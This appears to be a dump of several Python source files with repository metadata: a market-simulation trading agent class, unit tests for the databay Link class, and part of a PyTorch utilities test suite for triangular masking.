    """Agent that, after trading, copies the quote of a random same-side agent."""

    def __init__(self, id, sellprice=maxP, bidprice=1):
        Agent.__init__(self,id)
        self.sellprice = sellprice  # ask price, defaults to maxP (from utility)
        self.bidprice = bidprice    # bid price

    def __str__(self):
        return '<ImitatingAgent %d owns %d share with sell price %f and bidprice %f>' % (self.id, self.share, self.sellprice, self.bidprice)

    def resetPrice(self, market=None):
        """Adopt the quote of a randomly chosen agent on the same market side."""
        if self.share > 0:
            # Case as of a Potential Seller
            temp = []
            temp = [a for a in market.agentlist if a.share]
            random.shuffle(temp)
            tempAgent = temp[0]
            self.sellprice = tempAgent.sellprice
        elif not self.share:
            # Case as of a potential buyer
            temp = []
            temp = [a for a in market.agentlist if not a.share]
            random.shuffle(temp)
            tempAgent = temp[0]
            self.bidprice = tempAgent.bidprice

    def sell(self, market=None):
        """Pick the highest-bidding non-holder; return (buyer, price) or (None, None)."""
        if updateSellorBidPrice():
            self.sellprice -= 1
        if not market.num_buyer:
            return None, None
        else:
            index = -1
            maxBuy = 1
            for i,s in enumerate(market.agentlist):
                if s.bidprice > maxBuy and not s.share:
                    index, maxBuy = i, s.bidprice
            # NOTE(review): if no buyer matches, index stays -1 and this returns
            # the LAST agent in the list at price 1 — confirm this is intended.
            curr_buyer_agent = market.agentlist[index]
            tranction_price = maxBuy
            return curr_buyer_agent, tranction_price

    def buy(self, market=None):
        """Pick the lowest-asking holder, or buy at the market price."""
        # a) Update the price
        if updateSellorBidPrice():
            self.bidprice += 1
        if not market.num_seller:
            print('haha')
            return None, market.stockprice
        else:
            index = -1
            minSell = maxP
            for i,s in enumerate(market.agentlist):
                if s.sellprice < minSell and s.share:
                    index, minSell = i, s.sellprice
            print('Agent ' + str(index+1) + ' offers to sell the lowest price £' + str(minSell))
            # Buy at market
            if market.stockprice < minSell and market.shares > 0:
                return None, market.stockprice
            else:
                # Buy from Sellers
                curr_seller_agent = market.agentlist[index]
                tranction_price = minSell
                return curr_seller_agent, tranction_price

    def record(self, direction, price, market=None, quantity=1, reset=True):
        """Record the transaction; when *reset*, imitate another agent's quote."""
        if direction: #If Sell
            self.share -= quantity
            self.sell_record.append(price)
        else:
            self.share += quantity
            self.buy_record.append(price)
        if reset:
            print('reset price')
            print(market)
            self.resetPrice(market=market)

    def newact(self, market):
        """Decide a trade: holders sell, non-holders buy.

        Returns (counterparty_or_None, transaction_price, direction).
        """
        # If the agent has one share, the agent is a seller
        if self.share:
            direction = SELL
            current_buyer, transaction_price = self.sell(market=market)
            return current_buyer, transaction_price, direction
        else:
            direction = BUY
            current_seller, transaction_price = self.buy(market=market)
            return current_seller, transaction_price, direction
# Test
if __name__ == '__main__':
    # No standalone behavior yet; this module is intended to be imported.
    pass
| 32.1875
| 140
| 0.571909
| 875
| 7,725
| 4.930286
| 0.153143
| 0.027121
| 0.023644
| 0.029207
| 0.7828
| 0.76611
| 0.745712
| 0.745712
| 0.745712
| 0.701437
| 0
| 0.004947
| 0.345761
| 7,725
| 240
| 141
| 32.1875
| 0.848239
| 0.130874
| 0
| 0.773585
| 0
| 0
| 0.041279
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.119497
| false
| 0.006289
| 0.018868
| 0.025157
| 0.27044
| 0.044025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
be08e2af1448fd294e7ea8f8a1b7044cfc0c3737
| 17,651
|
py
|
Python
|
test/test/unit/test_link.py
|
00mjk/databay
|
b11a43b02bed001d0aef89f796b63dfba2da7363
|
[
"Apache-2.0"
] | 1
|
2021-04-02T16:34:57.000Z
|
2021-04-02T16:34:57.000Z
|
test/test/unit/test_link.py
|
00mjk/databay
|
b11a43b02bed001d0aef89f796b63dfba2da7363
|
[
"Apache-2.0"
] | null | null | null |
test/test/unit/test_link.py
|
00mjk/databay
|
b11a43b02bed001d0aef89f796b63dfba2da7363
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import logging
from asyncio import Future
from datetime import timedelta
from unittest import TestCase, mock
from unittest.mock import MagicMock, patch
import databay
from databay import Inlet, Outlet
from databay.errors import InvalidNodeError
from databay.link import Link
from test_utils import DummyException, fqname
# monkey patch the MagicMock's await
async def async_magic():
    """No-op coroutine backing the awaitable-MagicMock monkey patch below."""


def _mock_await(self):
    # Delegate to a real coroutine so ``await mock`` resolves to None.
    return async_magic().__await__()


MagicMock.__await__ = _mock_await
def pull_mock(rv=None):
    """Build a MagicMock whose call returns a coroutine resolving to *rv*.

    When *rv* is omitted, a fresh single-object list is produced instead.
    """
    payload = [object()] if rv is None else rv

    async def _pull(_):
        return payload

    return MagicMock(side_effect=_pull)
class DummyIterable():
    """Test fixture: iterable that raises DummyException as soon as it is iterated."""

    def __iter__(self):
        # Simulates an inlet return value that blows up on iteration.
        raise DummyException()
class TestLink(TestCase):
    """Unit tests for ``databay.link.Link``.

    Covers record transfer, exception propagation/suppression, the
    start/shutdown lifecycle, inlet/outlet management and tag/name handling.
    """

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_transfer(self, inlet, outlet):
        link = Link([inlet], [outlet], timedelta(
            seconds=1), tags='test_update')
        link.transfer()

        inlet._pull.assert_called()
        outlet._push.assert_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_run(self, inlet, outlet):
        async def task():
            link = Link([inlet], [outlet], timedelta(seconds=1),
                        tags='test_run', copy_records=False)
            inlet_result = await inlet._pull(None)
            await link._run()

            inlet._pull.assert_called()
            outlet._push.assert_called_with(inlet_result, mock.ANY)

        asyncio.run(task())

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_exception_inlet(self, inlet, outlet):
        inlet._pull.side_effect = DummyException('Test exception')
        link = Link([inlet], [outlet], timedelta(seconds=1),
                    ignore_exceptions=False, tags='test_exception_inlet')
        self.assertRaises(DummyException, link.transfer)

        inlet._pull.assert_called()
        outlet._push.assert_not_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_exception_outlet(self, inlet, outlet):
        outlet._push.side_effect = DummyException('Test exception')
        # Fix: the Link was previously constructed twice in a row; one
        # construction is sufficient and the duplicate was dead code.
        link = Link([inlet], [outlet], timedelta(seconds=1),
                    ignore_exceptions=False, tags='test_exception_outlet')
        self.assertRaises(DummyException, link.transfer)

        inlet._pull.assert_called()
        outlet._push.assert_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_exception_caught(self, inlet, outlet):
        logging.getLogger('databay.Link').setLevel(logging.CRITICAL)
        inlet._pull.side_effect = DummyException('Test inlet exception')
        outlet._push.side_effect = DummyException('Test outlet exception')
        link = Link([inlet], [outlet], timedelta(seconds=1),
                    tags='test_exception_caught', ignore_exceptions=True)
        try:
            link.transfer()
        except Exception as e:
            self.fail(f'Should not raise exception: {e}')

        inlet._pull.assert_called()
        outlet._push.assert_called()

    # check that one exception doesn't halt other inlets or outlets
    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_ignore_partial_exception(self, inlet1, inlet2, outlet1, outlet2):
        logging.getLogger('databay.Link').setLevel(logging.CRITICAL)

        async def task():
            inlet1._pull.side_effect = DummyException('Test inlet1 exception')
            outlet1._push.side_effect = DummyException(
                'Test outlet1 exception')
            link = Link([inlet1, inlet2], [outlet1, outlet2], timedelta(
                seconds=1), tags='test_ignore_partial_exception', copy_records=False, ignore_exceptions=True)
            results = await inlet2._pull(None)
            await link._run()

            inlet1._pull.assert_called()
            inlet2._pull.assert_called()
            outlet1._push.assert_called_with(results, mock.ANY)
            outlet2._push.assert_called_with(results, mock.ANY)

        asyncio.run(task())

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_on_start(self, inlet1, outlet1):
        type(inlet1).active = mock.PropertyMock(return_value=False)
        type(outlet1).active = mock.PropertyMock(return_value=False)
        link = Link([inlet1], [outlet1], timedelta(
            seconds=1), tags='test_on_start')
        link.on_start()

        inlet1.try_start.assert_called()
        outlet1.try_start.assert_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_on_start_already_active(self, inlet1, outlet1):
        type(inlet1).active = mock.PropertyMock(return_value=True)
        type(outlet1).active = mock.PropertyMock(return_value=True)
        link = Link([inlet1], [outlet1], timedelta(seconds=1),
                    tags='test_on_start_already_active')
        link.on_start()

        inlet1.on_start.assert_not_called()
        outlet1.on_start.assert_not_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_on_shutdown(self, inlet1, outlet1):
        type(inlet1).active = mock.PropertyMock(return_value=True)
        type(outlet1).active = mock.PropertyMock(return_value=True)
        link = Link([inlet1], [outlet1], timedelta(
            seconds=1), tags='test_on_shutdown')
        link.on_shutdown()

        inlet1.try_shutdown.assert_called()
        outlet1.try_shutdown.assert_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_shutdown_already_inactive(self, inlet1, outlet1):
        type(inlet1).active = mock.PropertyMock(return_value=False)
        type(outlet1).active = mock.PropertyMock(return_value=False)
        link = Link([inlet1], [outlet1], timedelta(seconds=1),
                    tags='test_on_shutdown_already_inactive')
        link.on_shutdown()

        inlet1.on_shutdown.assert_not_called()
        outlet1.on_shutdown.assert_not_called()

    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_add_inlet(self, inlet1):
        link = Link([], [], timedelta(seconds=1), tags='test_add_inlet')
        link.add_inlets(inlet1)

        self.assertEqual(link.inlets, [inlet1])

    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_add_inlet_multiple(self, inlet1, inlet2):
        link = Link([], [], timedelta(seconds=1),
                    tags='test_add_inlet_multiple')
        link.add_inlets([inlet1, inlet2])

        self.assertEqual(link.inlets, [inlet1, inlet2])

    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_add_inlet_same(self, inlet1):
        link = Link([], [], timedelta(seconds=1), tags='test_add_inlet_same')
        link.add_inlets(inlet1)

        self.assertRaises(InvalidNodeError, link.add_inlets, inlet1)
        self.assertEqual(link.inlets, [inlet1])

    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_remove_inlet(self, inlet1, inlet2):
        link = Link([], [], timedelta(seconds=1), tags='test_remove_inlet')
        link.add_inlets([inlet1, inlet2])
        link.remove_inlets(inlet2)

        self.assertEqual(link.inlets, [inlet1])

    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock())
    def test_remove_inlet_invalid(self, inlet1, inlet2):
        link = Link([], [], timedelta(seconds=1),
                    tags='test_remove_inlet_invalid')
        link.add_inlets([inlet1])

        self.assertRaises(InvalidNodeError, link.remove_inlets, inlet2)
        self.assertEqual(link.inlets, [inlet1])

    @patch(fqname(Outlet), spec=Outlet)
    def test_add_outlet(self, outlet1):
        link = Link([], [], timedelta(seconds=1), tags='test_add_outlet')
        link.add_outlets(outlet1)

        self.assertEqual(link.outlets, [outlet1])

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Outlet), spec=Outlet)
    def test_add_outlet_multiple(self, outlet1, outlet2):
        link = Link([], [], timedelta(seconds=1),
                    tags='test_add_outlet_multiple')
        link.add_outlets([outlet1, outlet2])

        self.assertEqual(link.outlets, [outlet1, outlet2])

    @patch(fqname(Outlet), spec=Outlet)
    def test_add_outlet_same(self, outlet1):
        link = Link([], [], timedelta(seconds=1), tags='test_add_outlet_same')
        link.add_outlets(outlet1)

        self.assertRaises(InvalidNodeError, link.add_outlets, outlet1)
        self.assertEqual(link.outlets, [outlet1])

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Outlet), spec=Outlet)
    def test_remove_outlet(self, outlet1, outlet2):
        link = Link([], [], timedelta(seconds=1), tags='test_remove_outlet')
        link.add_outlets([outlet1, outlet2])
        link.remove_outlets(outlet2)

        self.assertEqual(link.outlets, [outlet1])

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Outlet), spec=Outlet)
    def test_remove_outlet_invalid(self, outlet1, outlet2):
        link = Link([], [], timedelta(seconds=1),
                    tags='test_remove_outlet_invalid')
        link.add_outlets([outlet1])

        self.assertRaises(InvalidNodeError, link.remove_outlets, outlet2)
        self.assertEqual(link.outlets, [outlet1])

    # this rv is invalid, should be a list
    # NOTE: disabled via the 'x' prefix; kept for reference.
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock(object()))
    def xtest_non_iterable_raised(self, inlet1):
        logging.getLogger('databay.Link').setLevel(logging.ERROR)
        link = Link([inlet1], [], timedelta(seconds=1),
                    tags='test_non_iterable_raised')

        with self.assertRaisesRegex(TypeError, 'Inlets must return iterable'):
            link.transfer()

    # this rv will raise DummyException
    @patch(fqname(Inlet), spec=Inlet, _pull=pull_mock(DummyIterable()))
    def test_generic_error_raised(self, inlet1):
        logging.getLogger('databay.Link').setLevel(logging.ERROR)
        link = Link([inlet1], [], timedelta(seconds=1),
                    tags='test_generic_error_raised')

        self.assertRaises(DummyException, link.transfer)

    def test_integer_to_timedelta(self):
        link = Link([], [], 1, name='test_integer_interval_coerced')
        self.assertEqual(link._interval, timedelta(seconds=1))

    def test_float_to_timedelta(self):
        link = Link([], [], 1.5, name='test_float_interval_coerced')
        self.assertEqual(link._interval, timedelta(seconds=1.5))

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_start_inlet_exception_raise(self, inlet1, outlet1):
        inlet1.try_start.side_effect = lambda: exec('raise(RuntimeError())')
        link = Link([inlet1], [outlet1], timedelta(
            seconds=1), tags='test_on_start')

        self.assertRaises(RuntimeError, link.on_start)
        inlet1.try_start.assert_called()
        outlet1.try_start.assert_not_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_start_inlet_exception_catch(self, inlet1, outlet1):
        logging.getLogger('databay.Link').setLevel(logging.WARNING)
        inlet1.try_start.side_effect = lambda: exec('raise(RuntimeError())')
        link = Link([inlet1], [outlet1], timedelta(seconds=1),
                    tags='test_on_start', ignore_exceptions=True)

        with self.assertLogs(logging.getLogger('databay.Link'), level='ERROR') as cm:
            link.on_start()
            self.assertTrue(
                'on_start inlet exception: "" for inlet:' in ';'.join(cm.output))

        inlet1.try_start.assert_called()
        outlet1.try_start.assert_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_start_outlet_exception_raise(self, inlet1, outlet1, outlet2):
        outlet1.try_start.side_effect = lambda: exec('raise(RuntimeError())')
        link = Link([inlet1], [outlet1, outlet2],
                    timedelta(seconds=1), tags='test_on_start')

        self.assertRaises(RuntimeError, link.on_start)
        inlet1.try_start.assert_called()
        outlet1.try_start.assert_called()
        outlet2.try_start.assert_not_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_start_outlet_exception_catch(self, inlet1, outlet1, outlet2):
        logging.getLogger('databay.Link').setLevel(logging.WARNING)
        outlet1.try_start.side_effect = lambda: exec('raise(RuntimeError())')
        link = Link([inlet1], [outlet1, outlet2], timedelta(
            seconds=1), tags='test_on_start', ignore_exceptions=True)

        with self.assertLogs(logging.getLogger('databay.Link'), level='ERROR') as cm:
            link.on_start()
            self.assertTrue(
                'on_start outlet exception: "" for outlet:' in ';'.join(cm.output), cm.output)

        inlet1.try_start.assert_called()
        outlet1.try_start.assert_called()
        outlet2.try_start.assert_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_shutdown_inlet_exception_raise(self, inlet1, outlet1):
        inlet1.try_shutdown.side_effect = lambda: exec('raise(RuntimeError())')
        link = Link([inlet1], [outlet1], timedelta(
            seconds=1), tags='test_on_shutdown')

        self.assertRaises(RuntimeError, link.on_shutdown)
        inlet1.try_shutdown.assert_called()
        outlet1.try_shutdown.assert_not_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_shutdown_inlet_exception_catch(self, inlet1, outlet1):
        logging.getLogger('databay.Link').setLevel(logging.WARNING)
        inlet1.try_shutdown.side_effect = lambda: exec('raise(RuntimeError())')
        link = Link([inlet1], [outlet1], timedelta(seconds=1),
                    tags='test_on_shutdown', ignore_exceptions=True)

        with self.assertLogs(logging.getLogger('databay.Link'), level='ERROR') as cm:
            link.on_shutdown()
            self.assertTrue(
                'on_shutdown inlet exception: "" for inlet:' in ';'.join(cm.output), cm.output)

        inlet1.try_shutdown.assert_called()
        outlet1.try_shutdown.assert_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_shutdown_outlet_exception_raise(self, inlet1, outlet1, outlet2):
        outlet1.try_shutdown.side_effect = lambda: exec(
            'raise(RuntimeError())')
        link = Link([inlet1], [outlet1, outlet2], timedelta(
            seconds=1), tags='test_on_shutdown')

        self.assertRaises(RuntimeError, link.on_shutdown)
        inlet1.try_shutdown.assert_called()
        outlet1.try_shutdown.assert_called()
        outlet2.try_shutdown.assert_not_called()

    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Outlet), spec=Outlet)
    @patch(fqname(Inlet), spec=Inlet)
    def test_on_shutdown_outlet_exception_catch(self, inlet1, outlet1, outlet2):
        logging.getLogger('databay.Link').setLevel(logging.WARNING)
        outlet1.try_shutdown.side_effect = lambda: exec(
            'raise(RuntimeError())')
        link = Link([inlet1], [outlet1, outlet2], timedelta(
            seconds=1), tags='test_on_shutdown', ignore_exceptions=True)

        with self.assertLogs(logging.getLogger('databay.Link'), level='ERROR') as cm:
            link.on_shutdown()
            self.assertTrue('on_shutdown outlet exception: "" for outlet:' in ';'.join(
                cm.output), cm.output)

        inlet1.try_shutdown.assert_called()
        outlet1.try_shutdown.assert_called()
        outlet2.try_shutdown.assert_called()

    def test_single_tag(self):
        tag = 'tagA'
        link = Link([], [], timedelta(seconds=1), tags=tag)
        self.assertEqual(link.tags, [tag])

    def test_multiple_tags(self):
        tagA = 'tagA'
        tagB = 'tagB'
        link = Link([], [], timedelta(seconds=1), tags=[tagA, tagB])
        self.assertEqual(link.tags, [tagA, tagB])

    def test_tag_as_name(self):
        link_name = 'link_name'
        link = Link([], [], timedelta(seconds=1), name=link_name)
        self.assertEqual(link_name, link.tags[0])

    def test_name_from_tag(self):
        link_name = 'link_name'
        link = Link([], [], timedelta(seconds=1), tags=[link_name])
        self.assertEqual(link.name, link.tags[0])
| 38.623632
| 109
| 0.659453
| 2,086
| 17,651
| 5.35954
| 0.072867
| 0.059034
| 0.056261
| 0.058229
| 0.833989
| 0.790072
| 0.76288
| 0.748748
| 0.701073
| 0.650089
| 0
| 0.015361
| 0.210753
| 17,651
| 456
| 110
| 38.708333
| 0.787165
| 0.02963
| 0
| 0.559524
| 0
| 0
| 0.078591
| 0.030618
| 0
| 0
| 0
| 0
| 0.232143
| 1
| 0.113095
| false
| 0.002976
| 0.032738
| 0
| 0.157738
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
be10279a3707fb64bc7a51caf1c4e8c2ff7d2db3
| 22
|
py
|
Python
|
test/fixture/python_scanner/nested1/nested2/nested3/imports_parent_module.py
|
Valkatraz/scons
|
5e70c65f633dcecc035751c9f0c6f894088df8a0
|
[
"MIT"
] | 1,403
|
2017-11-23T14:24:01.000Z
|
2022-03-30T20:59:39.000Z
|
test/fixture/python_scanner/nested1/nested2/nested3/imports_parent_module.py
|
Valkatraz/scons
|
5e70c65f633dcecc035751c9f0c6f894088df8a0
|
[
"MIT"
] | 3,708
|
2017-11-27T13:47:12.000Z
|
2022-03-29T17:21:17.000Z
|
test/fixture/python_scanner/nested1/nested2/nested3/imports_parent_module.py
|
Valkatraz/scons
|
5e70c65f633dcecc035751c9f0c6f894088df8a0
|
[
"MIT"
] | 281
|
2017-12-01T23:48:38.000Z
|
2022-03-31T15:25:44.000Z
|
from .. import module
| 11
| 21
| 0.727273
| 3
| 22
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
07ad856f987231b2fd44b496100d308f64913ad4
| 19,625
|
py
|
Python
|
tests/unit/test_general.py
|
windionleaf/windPyTorchUtils
|
252b05fd8a4264349f5a434d88cf25c3a808d51d
|
[
"Unlicense"
] | null | null | null |
tests/unit/test_general.py
|
windionleaf/windPyTorchUtils
|
252b05fd8a4264349f5a434d88cf25c3a808d51d
|
[
"Unlicense"
] | null | null | null |
tests/unit/test_general.py
|
windionleaf/windPyTorchUtils
|
252b05fd8a4264349f5a434d88cf25c3a808d51d
|
[
"Unlicense"
] | null | null | null |
# -*- coding: UTF-8 -*-
""""
Created on 03.11.19
Unit tests for torch utils module.
:author: Martin Dočekal
"""
import unittest
import torch
from windpytorchutils.general import batch_tril_set, batch_triu_set, span_mask, proliferate
class TestTorchUtils(unittest.TestCase):
"""
Unit test class for some of the torch utils.
"""
def setUp(self) -> None:
self.batch = torch.tensor([
[
[1.0, 2.0, 3.0],
[1.0, 2.0, 3.0],
[1.0, 2.0, 3.0]
],
[
[10, 11, 12],
[13, 14, 15],
[16, 17, 18],
]
])
self.batchClone = self.batch.clone()
self.batchRectangleShapeA = torch.tensor([
[
[1.0, 2.0, 3.0],
[1.0, 2.0, 3.0]
],
[
[10, 11, 12],
[13, 14, 15]
]
])
self.batchRectangleShapeAClone = self.batchRectangleShapeA.clone()
self.batchRectangleShapeB = torch.tensor([
[
[1.0, 2.0],
[1.0, 2.0],
[1.0, 2.0]
],
[
[10, 11],
[13, 14],
[16, 17],
]
])
self.batchRectangleShapeBClone = self.batchRectangleShapeB.clone()
self.trilRes = torch.tensor([
[
[0.0, 2.0, 3.0],
[0.0, 0.0, 3.0],
[0.0, 0.0, 0.0]
],
[
[0, 11, 12],
[0, 0, 15],
[0, 0, 0],
]
])
self.trilResRecShapeA = torch.tensor([
[
[0.0, 2.0, 3.0],
[0.0, 0.0, 3.0]
],
[
[0, 11, 12],
[0, 0, 15]
]
])
self.trilResRecShapeB = torch.tensor([
[
[0.0, 2.0],
[0.0, 0.0],
[0.0, 0.0]
],
[
[0, 11],
[0, 0],
[0, 0],
]
])
self.trilWithoutDiagonalRes = torch.tensor([
[
[1.0, 2.0, 3.0],
[0.0, 2.0, 3.0],
[0.0, 0.0, 3.0]
],
[
[10, 11, 12],
[0, 14, 15],
[0, 0, 18],
]
])
self.trilWithoutDiagonalResRecShapeA = torch.tensor([
[
[1.0, 2.0, 3.0],
[0.0, 2.0, 3.0]
],
[
[10, 11, 12],
[0, 14, 15]
]
])
self.trilWithoutDiagonalResRecShapeB = torch.tensor([
[
[1.0, 2.0],
[0.0, 2.0],
[0.0, 0.0]
],
[
[10, 11],
[0, 14],
[0, 0],
]
])
self.triuRes = torch.tensor([
[
[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[1.0, 2.0, 0.0]
],
[
[0, 0, 0],
[13, 0, 0],
[16, 17, 0],
]
])
self.triuResRecShapeA = torch.tensor([
[
[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0]
],
[
[0, 0, 0],
[13, 0, 0]
]
])
self.triuResRecShapeB = torch.tensor([
[
[0.0, 0.0],
[1.0, 0.0],
[1.0, 2.0]
],
[
[0, 0],
[13, 0],
[16, 17],
]
])
self.triuWithoutDiagonalRes = torch.tensor([
[
[1.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[1.0, 2.0, 3.0]
],
[
[10, 0, 0],
[13, 14, 0],
[16, 17, 18],
]
])
self.triuWithoutDiagonalResRecShapeA = torch.tensor([
[
[1.0, 0.0, 0.0],
[1.0, 2.0, 0.0]
],
[
[10, 0, 0],
[13, 14, 0]
]
])
self.triuWithoutDiagonalResRecShapeB = torch.tensor([
[
[1.0, 0.0],
[1.0, 2.0],
[1.0, 2.0]
],
[
[10, 0],
[13, 14],
[16, 17],
]
])
def test_batch_tril_set(self):
    """batch_tril_set must zero the lower triangle (incl. diagonal) out of place."""
    cases = [
        (self.batch, self.trilRes),
        (self.batchRectangleShapeA, self.trilResRecShapeA),
        (self.batchRectangleShapeB, self.trilResRecShapeB),
    ]
    for source, expected in cases:
        res = batch_tril_set(source, 0.0)
        self.assertTrue(torch.equal(res, expected),
                        msg="Difference:\n{}".format(expected - res))
    # the inputs must be left untouched (out-of-place by default)
    self.assertTrue(torch.equal(self.batch, self.batchClone))
    self.assertTrue(torch.equal(self.batchRectangleShapeA, self.batchRectangleShapeAClone))
    self.assertTrue(torch.equal(self.batchRectangleShapeB, self.batchRectangleShapeBClone))
def test_batch_tril_set_in_place(self):
    """In-place batch_tril_set must both return and mutate the argument."""
    cases = [
        (self.batch, self.trilRes),
        (self.batchRectangleShapeA, self.trilResRecShapeA),
        (self.batchRectangleShapeB, self.trilResRecShapeB),
    ]
    for source, expected in cases:
        work = source.clone()
        res = batch_tril_set(work, 0.0, True, True)
        self.assertTrue(torch.equal(res, expected),
                        msg="Difference:\n{}".format(expected - res))
        # in-place mode must also modify the argument itself
        self.assertTrue(torch.equal(work, expected),
                        msg="Difference:\n{}".format(expected - work))
def test_batch_tril_set_without_diagonal(self):
    """batch_tril_set with diagonal=False must zero only the strictly-lower triangle."""
    cases = [
        (self.batch, self.trilWithoutDiagonalRes),
        (self.batchRectangleShapeA, self.trilWithoutDiagonalResRecShapeA),
        (self.batchRectangleShapeB, self.trilWithoutDiagonalResRecShapeB),
    ]
    for source, expected in cases:
        res = batch_tril_set(source, 0.0, False)
        self.assertTrue(torch.equal(res, expected),
                        msg="Difference:\n{}".format(expected - res))
    # the inputs must be left untouched (out-of-place by default)
    self.assertTrue(torch.equal(self.batch, self.batchClone))
    self.assertTrue(torch.equal(self.batchRectangleShapeA, self.batchRectangleShapeAClone))
    self.assertTrue(torch.equal(self.batchRectangleShapeB, self.batchRectangleShapeBClone))
def test_batch_tril_set_without_diagonal_in_place(self):
    """In-place batch_tril_set without diagonal must return and mutate the argument."""
    cases = [
        (self.batch, self.trilWithoutDiagonalRes),
        (self.batchRectangleShapeA, self.trilWithoutDiagonalResRecShapeA),
        (self.batchRectangleShapeB, self.trilWithoutDiagonalResRecShapeB),
    ]
    for source, expected in cases:
        work = source.clone()
        res = batch_tril_set(work, 0.0, False, True)
        self.assertTrue(torch.equal(res, expected),
                        msg="Difference:\n{}".format(expected - res))
        # in-place mode must also modify the argument itself
        self.assertTrue(torch.equal(work, expected),
                        msg="Difference:\n{}".format(expected - work))
def test_batch_triu_set(self):
    """batch_triu_set must zero the upper triangle (incl. diagonal) out of place."""
    cases = [
        (self.batch, self.triuRes),
        (self.batchRectangleShapeA, self.triuResRecShapeA),
        (self.batchRectangleShapeB, self.triuResRecShapeB),
    ]
    for source, expected in cases:
        res = batch_triu_set(source, 0.0)
        self.assertTrue(torch.equal(res, expected),
                        msg="Difference:\n{}".format(expected - res))
    # the inputs must be left untouched (out-of-place by default)
    self.assertTrue(torch.equal(self.batch, self.batchClone))
    self.assertTrue(torch.equal(self.batchRectangleShapeA, self.batchRectangleShapeAClone))
    self.assertTrue(torch.equal(self.batchRectangleShapeB, self.batchRectangleShapeBClone))
def test_batch_triu_set_in_place(self):
    """In-place batch_triu_set must both return and mutate the argument."""
    cases = [
        (self.batch, self.triuRes),
        (self.batchRectangleShapeA, self.triuResRecShapeA),
        (self.batchRectangleShapeB, self.triuResRecShapeB),
    ]
    for source, expected in cases:
        work = source.clone()
        res = batch_triu_set(work, 0.0, True, True)
        self.assertTrue(torch.equal(res, expected),
                        msg="Difference:\n{}".format(expected - res))
        # in-place mode must also modify the argument itself
        self.assertTrue(torch.equal(work, expected),
                        msg="Difference:\n{}".format(expected - work))
def test_batch_triu_set_without_diagonal(self):
    """batch_triu_set with diagonal=False must zero only the strictly-upper triangle."""
    cases = [
